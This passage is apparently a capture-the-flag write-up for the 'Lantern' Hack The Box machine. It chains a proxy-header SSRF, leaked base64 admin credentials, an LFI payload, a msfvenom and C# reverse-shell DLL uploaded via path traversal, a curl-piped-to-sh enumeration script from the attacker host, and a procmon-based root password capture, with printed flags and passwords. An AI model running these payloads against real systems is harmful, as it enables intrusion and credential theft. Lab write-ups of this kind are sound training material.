      "System.Web.dll": "sha256-jL2UY\/jFcH+aR4qy5E5D8aEpUPs0QUPeAen5UVcZyR8=",
      "System.Windows.dll": "sha256-8bl48xmJJ3TBcL+t29aLb660\/zfuxABv0NlNswPdsXE=",
      "System.Xml.Linq.dll": "sha256-PW5GMzZw4Kfb+PxHM\/3esXbvflMgxv2Gozi4c8r+KLA=",
      "System.Xml.ReaderWriter.dll": "sha256-92YmEAsQ+w8VKPUIZtNcPiSJ17bjTPtT8PmsI8Q0sGI=",
      "System.Xml.Serialization.dll": "sha256-YgESAq2VAp6Dm+Wp19D+FRkDgZk\/MZ3tJwB2SuRu7Xk=",
      "System.Xml.XDocument.dll": "sha256-reoziM29CWZA9uIQMVdtm7s9yIQCuanDqA2ELdwILEs=",
      "System.Xml.XPath.XDocument.dll": "sha256-yVwzItpv4vHQDwQCqM78Ydv2uHtSJYcZWJ1ZaRW\/ftc=",
      "System.Xml.XPath.dll": "sha256-4axHEHFvTq1\/VzammSA38SdUn4qbE\/4070jr6gQHvco=",
      "System.Xml.XmlDocument.dll": "sha256-S+Xk7z\/96t8ab30tKeYkqJi8fCecr7VDKhYGYUyWoTo=",
      "System.Xml.XmlSerializer.dll": "sha256-8phryTFy1MDMCmjKD0tOs071P7GjND0DJdiSUZBpBPc=",
      "System.Xml.dll": "sha256-Rg18wjp7\/BZHM0dC51OnrC39cUCu25BOS9+i8r7bUrM=",
      "System.dll": "sha256-YKqpzE+7ICNb3IBWe6kXM+dCR18TTaRnThuOy6NLcG4=",
      "WindowsBase.dll": "sha256-k04wZob3UNWysInC\/KRbcfiSMMSXDv56yL6raT6AnZk=",
      "mscorlib.dll": "sha256-veli+XvWHzkA3s4t4DKI+XiyNMpfHQjiO002+ExANkU=",
      "netstandard.dll": "sha256-O9JhHo5KqxkmwmapuxuhG\/iMRV7RHcrCDO9z+yv+8yI=",
      "System.Private.CoreLib.dll": "sha256-6rKu8tPdUGsvbSpesoNMVzbx7bNqPRMPV34eI7vSYaQ=",
      "InternaLantern.dll": "sha256-pblWkC\/PhCCSxn1VOi3fajA0xS3mX\/\/RC0XvAE\/n5cI="
    },
    "extensions": null,
    "lazyAssembly": null,
    "libraryInitializers": null,
    "pdb": {
      "InternaLantern.pdb": "sha256-E8WICkNg65vorw8OEDOe6K9nJxL0QSt1S4SZoX5rTOY="
    },
    "runtime": {
      "dotnet.timezones.blat": "sha256-KsGUR9nqtXb3Hy6IrNlnc1HoSS+AFlsXTX9rq4oChtA=",
      "icudt.dat": "sha256-Zuq0dWAsBm6\/2lSOsz7+H9PvFaRn61KIXHMMwXDfvyE=",
      "icudt_CJK.dat": "sha256-WPyI4hWDPnOw62Nr27FkzGjdbucZnQD+Ph+GOPhAedw=",
      "icudt_EFIGS.dat": "sha256-4RwaPx87Z4dvn77ie\/ro3\/QzyS+\/gGmO3Y\/0CSAXw4k=",
      "icudt_no_CJK.dat": "sha256-OxylFgLJlFqixsj+nLxYVsv5iZLvfIKMpLf9hrWaChA=",
      "dotnet.wasm": "sha256-JlqjjT2GZWeJko9+pitVfjjmJeEbi4AibzTQr5zTISo=",
      "dotnet..lzvsyl6wav.js": "sha256-6AcYHsbEEdBjeNDUUvrQZuRqASd62mZgQgxz4uzTVGU="
    },
    "satelliteResources": null
  }
} 
└─$ curl http://lantern.htb/_framework/blazor.boot.json -H 'X-Skipper-Proxy: http://127.0.0.1:5000' -s | grep -vE '"(Microsoft|System|SQL|Rad)' | grep dll
      "WindowsBase.dll": "sha256-k04wZob3UNWysInC\/KRbcfiSMMSXDv56yL6raT6AnZk=",
      "mscorlib.dll": "sha256-veli+XvWHzkA3s4t4DKI+XiyNMpfHQjiO002+ExANkU=",
      "netstandard.dll": "sha256-O9JhHo5KqxkmwmapuxuhG\/iMRV7RHcrCDO9z+yv+8yI=",
      "InternaLantern.dll": "sha256-pblWkC\/PhCCSxn1VOi3fajA0xS3mX\/\/RC0XvAE\/n5cI="
└─$ curl http://lantern.htb/_framework/InternaLantern.dll -H 'X-Skipper-Proxy: http://127.0.0.1:5000' -Os
Writeup-5.png
Uid = "JFMDK",
Name = "John",
InternalInfo = "SGVhZCBvZiBzYWxlcyBkZXBhcnRtZW50LCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBqb2huLnNAZXhhbXBsZS5jb20="

Uid = "PPAOS",
Name = "Anny",
InternalInfo = "SFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGFubnkudEBleGFtcGxlLmNvbQ=="

Uid = "UAYWP",
Name = "Catherine",
InternalInfo = "RnVsbFN0YWNrIGRldmVsb3BlciwgZW1lcmdlbmN5IGNvbnRhY3Q6ICs0NDEyMzQ1Njc4LCBlbWFpbDogY2F0aGVyaW5lLnJAZXhhbXBsZS5jb20="

Uid = "GMNZQ",
Name = "Lara",
InternalInfo = "UFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGxhcmEuc0BleGFtcGxlLmNvbQ=="

Uid = "XZCSF",
Name = "Lila",
InternalInfo = "SnVuaW9yIC5ORVQgZGV2ZWxvcGVyLCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBsaWxhLnNAZXhhbXBsZS5jb20="

Uid = "POMBS",
Name = "Travis",
InternalInfo = "U3lzdGVtIGFkbWluaXN0cmF0b3IsIEZpcnN0IGRheTogMjEvMS8yMDI0LCBJbml0aWFsIGNyZWRlbnRpYWxzIGFkbWluOkFKYkZBX1FAOTI1cDlhcCMyMi4gQXNrIHRvIGNoYW5nZSBhZnRlciBmaXJzdCBsb2dpbiE="
Writeup-6.png
System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22. Ask to change after first login!

Internal

Note: Using the proxy key we are able to see all DLLs used by blazor application in Network.

Add the X-Skipper-Proxy key to burp requests and then we are able to see Internal Pages of website

Writeup-9.png

SQLi

Book vacation is vulnerable to SQLi.

Writeup-10.png

Based on Dotnet application I assumed the database was MSSQL, but it's sqlite3?!

Writeup-11.png

110% rabbit hole as database is controlled by Javascript 💀

HTTP (3000) [Admin]

Creds: admin:AJbFA_Q@925p9ap#22

Admin Dashboard

Writeup-7.png

File Upload

If we try to upload any web shell via Upload Content we can't activate it because we get Content-Type: application/octet-stream

Writeup-8.png

Source

In files we can get source of app:

from flask import Flask, render_template, send_file, request, redirect, json
from werkzeug.utils import secure_filename
import os

app=Flask("__name__")

@app.route('/')
def index():
    if request.headers['Host'] != "lantern.htb":
        return redirect("http://lantern.htb/", code=302)
    return render_template("index.html")

@app.route('/vacancies')
def vacancies():
    return render_template('vacancies.html')

@app.route('/submit', methods=['POST'])
def save_vacancy():
    name = request.form.get('name')
    email = request.form.get('email')
    vacancy = request.form.get('vacancy', default='Middle Frontend Developer')

    if 'resume' in request.files:
        try:
            file = request.files['resume']
            resume_name = file.filename
            if resume_name.endswith('.pdf') or resume_name == '':
                filename = secure_filename(f"resume-{name}-{vacancy}-latern.pdf")
                upload_folder = os.path.join(os.getcwd(), 'uploads')
                destination = '/'.join([upload_folder, filename])
                file.save(destination)
            else:
                return "Only PDF files allowed!"
        except:
            return "Something went wrong!"
    return "Thank you! We will conact you very soon!"

@app.route('/PrivacyAndPolicy')
def sendPolicyAgreement():
    lang = request.args.get('lang')
    file_ext = request.args.get('ext')
    try:
            return send_file(f'/var/www/sites/localisation/{lang}.{file_ext}') 
    except: 
            return send_file(f'/var/www/sites/localisation/default/policy.pdf', 'application/pdf')

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8000)

LFI

LFI successful

└─$ curl 'http://lantern.htb/PrivacyAndPolicy?lang=./&ext=./../../../etc/hosts' -o-
127.0.0.1 localhost lantern.htb
127.0.1.1 lantern

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

There's a database somewhere...

        SqliteDbContextOptionsBuilderExtensions.UseSqlite(optionsBuilder, "Data Source=Data.db", (Action<SqliteDbContextOptionsBuilder>)null).UseLoggerFactory(LoggerFactory.Create(delegate(ILoggingBuilder builder)

I tried getting program cmdline's, but for whatever reason they were empty.. almost all PIDs.......

Components

If we enter incorrect module name we get the path to components:

Writeup-12.png
└─$ for file in {FileUpload,FileTree,Logs,HealthCheck,Resumes}; do curl "http://lantern.htb/PrivacyAndPolicy?lang=./&ext=./../../../opt/components/$file.dll" -so "$file.dll"; done;
└─$ file *
FileTree.dll:    PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
FileUpload.dll:  PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
HealthCheck.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
Logs.dll:        PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
Resumes.dll:     PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

Craft malicious payload:

└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o rev.dll

I tried changing the path as file was being uploaded, but wasn't able to get it into the components directory. If we reverse the process and point to images directory another error happens.

Writeup-13.png

Most probably no permission to read the file..

└─$ curl 'http://lantern.htb/PrivacyAndPolicy?lang=./&ext=./../../../home/tomas/LanternAdmin/bin/Debug/net6.0/LanternAdmin.dll' -so- | head -c 9
%PDF-1.4

It also seems case sensitive.

Writeup-14.png

SHEEEEEEEEEEEEEEEEEEEEEH!! After so much blood and sweat finally managed to get the right DLL type to get reverse shell.

Generate DLL like so: https://www.c-sharpcorner.com/UploadFile/1e050f/creating-and-using-dll-class-library-in-C-Sharp/ Revshells C# TCP Client payload from https://www.revshells.com

ReverseShellDLL.cs|h-50%

Project version and settings.

<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>
  <ItemGroup>
    <PackageReference Include="Microsoft.AspNetCore.Components" Version="6.0.25" />
  </ItemGroup>
</Project>

Note: Not positive if Microsoft.AspNetCore.Components was required.

Compile that bitch and upload. Make sure to use BTP Burp extension while editing or it might not work.

Writeup-16.png

Trigger the payload by Choose module and BAM Reverse shell babyyyyy!

../../../../../../../opt/components/Rev.dll
Writeup-15.png

Reverse Shell

script /dev/null -qc /bin/bash
tomas@lantern:~/LanternAdmin$ id
uid=1000(tomas) gid=1000(tomas) groups=1000(tomas)

User.txt

tomas@lantern:~$ cat user.txt
ef5c1abf2183258b5ab9286fb8ad6930

Privilege Escalation

To use proper shell add your public key in .ssh/authorized_keys and SSH into the box.

└─$ ssh tomas@10.129.131.78 -i ssh/tomas/id_rsa
tomas@lantern:~$ sudo -l
Matching Defaults entries for tomas on lantern:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User tomas may run the following commands on lantern:
    (ALL : ALL) NOPASSWD: /usr/bin/procmon
tomas@lantern:~$ curl 10.10.14.22/lp.sh|sh|tee /dev/shm/lp.log
...
╔══════════╣ Mails (limit 50)
    20774      4 -rw-r--r--   1 tomas    mail          539 Jul 31 12:00 /var/mail/tomas
    20774      4 -rw-r--r--   1 tomas    mail          539 Jul 31 12:00 /var/spool/mail/tomas
...
tomas@lantern:/var/mail$ cat tomas
From hr@lantern.htb Mon Jan 1 12:00:00 2023
Subject: Welcome to Lantern!

Hi Tomas,

Congratulations on joining the Lantern team as a Linux Engineer! We're thrilled to have you on board.

While we're setting up your new account, feel free to use the access and toolset of our previous team member. Soon, you'll have all the access you need.

Our admin is currently automating processes on the server. Before global testing, could you check out his work in /root/automation.sh? Your insights will be valuable.

Exciting times ahead!

Best.

Gather data about the process, after some time running the program top 2 syscalls were read and write so export only them:

tomas@lantern:~$ sudo /usr/bin/procmon -p $(pgrep -f automation) -e read,write
Writeup-17.png

Note: It's better to add -c flag and specify the output file from CLI. F6 export works, just no confirmation about save but its saved in cwd.

Binary: ProcMon-for-Linux

scp -i ../ssh/tomas_box/id_rsa tomas@10.129.240.35:./procmon_2024-08-18_14:42:46.db procmon.db
sqlite3 ./procmon.db "SELECT HEX(arguments) FROM ebpf WHERE syscall LIKE '%write%';" > write_data.txt
while read -r line; do echo $line | xxd -r -p >> write_data_decoded.txt; done <write_data.txt;
sqlite3 ./procmon.db "SELECT HEX(arguments) FROM ebpf WHERE syscall LIKE '%read%';" > read_data.txt
while read -r line; do echo $line | xxd -r -p >> read_data_decoded.txt; done <read_data.txt;
strings write_data_decoded.txt -n1 > write_data_decoded.strings.txt
strings read_data_decoded.txt -n1 > read_data_decoded.strings.txt
cat write_data_decoded.strings.txt | sort | uniq -c | sort -nr
cat read_data_decoded.strings.txt | sort | uniq -c | sort -nr
└─$ cat write_data_decoded.strings.txt | sort | uniq -c | sort -nr
   9470 (Becho4C(B Re
   4631 [?25l
   3095 [?25h
   1574 U
   1032 echo4C(B Re
    560 5
    529 u
    432 [?25l1B
    408 [?25h1B
    344 *
    286 [m
    284 (B
    190 d[?25h
    186 &
    172 M
    132 0
    132 `
     96 3[?25h
     94 p[?25h
     93 6H
     92 u[?25h
     91  [?25h
     79 I
     79 [?25lH(Becho4C(B Re
     66 y
     66 S5
     66 Pv5
     66 pA5
     66 p
     66 m5
     66 @J5
     66 g
     66 d5
     66 [5
     66
     60 e
     60 [1B
     50 [?25hH(Becho4C(B Re
     48 w[?25h
     48 t[?25h
     48  Q?25h
     48 M[?25h
     48 [K
     48 h[?25h1B
     48 e[?25h1B
     48 E[?25h
     48 c[?25h1B
     48
     46  s?25h
     46 s[?25h
     46 o[?25h
     46 k[?25h
     46 h[?25h
     46 c[?25h
     46 B[?25h
     46 b[?25h
     46 a[?25h
     46 /[?25h
     46 .[?25h
     46  .?25h
     46 [1Bl
     31  _
     24 [0;1m
     23 [A25l
     23 85
     22  |?25h
     19 [
     16 Becho4C(B Re
     16 [24;1H
     13 [H
     10 [?7h
     10 [4l
      8 Received SIGHUP or S
      6 B Re
      6 [?2004l
      6 [1Be
      3 f
      3 (B  GNU nano
      3 [?2004h
      3 [0;7m
      2 u[?25hH(Becho4C(B Re
      2 s[?25hH(Becho4C(B Re
      2 p[?25hH(Becho4C(B Re
      2 k[?25hH(Becho4C(B Re
      2 h[?25hH(Becho4C(B Re
      2 c[?25hH(Becho4C(B Re
      2 (BH(Becho4C(B Re
      2 b[?25hH(Becho4C(B Re
      2 a[?25hH(Becho4C(B Re
      2 /[?25hH(Becho4C(B Re
      2 .[?25hH(Becho4C(B Re
      2  .?25hH(Becho4C(B Re
      2 [1BlH(Becho4C(B Re
      1 [A25lH(Becho4C(B Re
      1  [?25hH(Becho4C(B Re
      1 [?25h4C(B Re
      1 [1;24r

There's a lot of suspicious pattern like {CHAR}[?25h, following up on that I filtered out the stream:

└─$ cat write_data_decoded.strings.txt | grep '\[\?25h' | sed -E 's/\s*\[?\?25h\s*//g' | tr -d '\n'
 s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMM4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B Re .H(Becho4C(B Re .H(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B Re/H(Becho4C(B Re/H(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RebH(Becho4C(B RebH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReaH(Becho4C(B ReaH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RecH(Becho4C(B RecH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RekH(Becho4C(B RekH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReuH(Becho4C(B ReuH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RepH(Becho4C(B RepH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B Re.H(Becho4C(B Re.H(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ResH(Becho4C(B ResH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RehH(Becho4C(B RehH(Becho4C(B ReH(Becho4C(B Re1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB

Nice, it's actual lines that nano is writing!

Split the lines by suuddoo word, get single line and delete repeated chars:

sudo ../backup.sh echo Q3Eddtdw3pMB
tomas@lantern:~$ su
Password: Q3Eddtdw3pMB
root@lantern:~# id
uid=0(root) gid=0(root) groups=0(root)
root@lantern:/home/tomas# cd /root

Root.txt

root@lantern:~# cat root.txt
9120fae6ebd342b55db50d2f86966df2

Root scripts

root@lantern:~# cat cleanup.sh
#!/bin/bash

# Directory to clean up in /opt/components
DIR_COMPONENTS="/opt/components"

# Files to exclude in /opt/components
EXCLUDE_FILES_COMPONENTS=("FileTree.dll" "FileUpload.dll" "HealthCheck.dll" "Logs.dll" "Resumes.dll")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_COMPONENTS=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_COMPONENTS[@]}")
EXCLUDE_PATTERN_COMPONENTS=${EXCLUDE_PATTERN_COMPONENTS:1}  # Remove leading '|'

# Find and delete files not in the exclude list in /opt/components
/usr/bin/find "$DIR_COMPONENTS" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_COMPONENTS" | while read -r file; do
    /bin/rm -f "$file"
done

# Directory to clean up in /var/www/sites/lantern.htb/static/images
DIR_IMAGES="/var/www/sites/lantern.htb/static/images"

# Files to exclude in /var/www/sites/lantern.htb/static/images
EXCLUDE_FILES_IMAGES=("about-1.jpg" "about-2.jpg" "about.jpg" "avatar-1.jpg" "avatar-2.jpg" "avatar.jpg" "bg-bot.jpg" "bg-top.jpg" "blog-1.jpg" "blog-2.jpg" "blog-3.jpg")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_IMAGES=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_IMAGES[@]}")
EXCLUDE_PATTERN_IMAGES=${EXCLUDE_PATTERN_IMAGES:1}  # Remove leading '|'

# Find and delete files not in the exclude list in /var/www/sites/lantern.htb/static/images
/usr/bin/find "$DIR_IMAGES" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_IMAGES" | while read -r file; do
    /bin/rm -f "$file"
done

/usr/sbin/service blazor-server restart
root@lantern:~# file bot.exp
bot.exp: a /usr/bin/expect -f script, ASCII text executable
root@lantern:~# cat bot.exp
#!/usr/bin/expect -f

spawn nano /root/automation.sh

set text "echo Q3Eddtdw3pMB | sudo ./backup.sh"

while {1} {
    foreach char [split $text ""] {
        send "$char"
        sleep 1
    }

    send "\r"

    sleep 0.5

    for {set i 0} {$i < [string length $text]} {incr i} {
        send "\b \b"  ;
    }

    send "\r"
}
PreviousInstantNextMonitorsThree

Last updated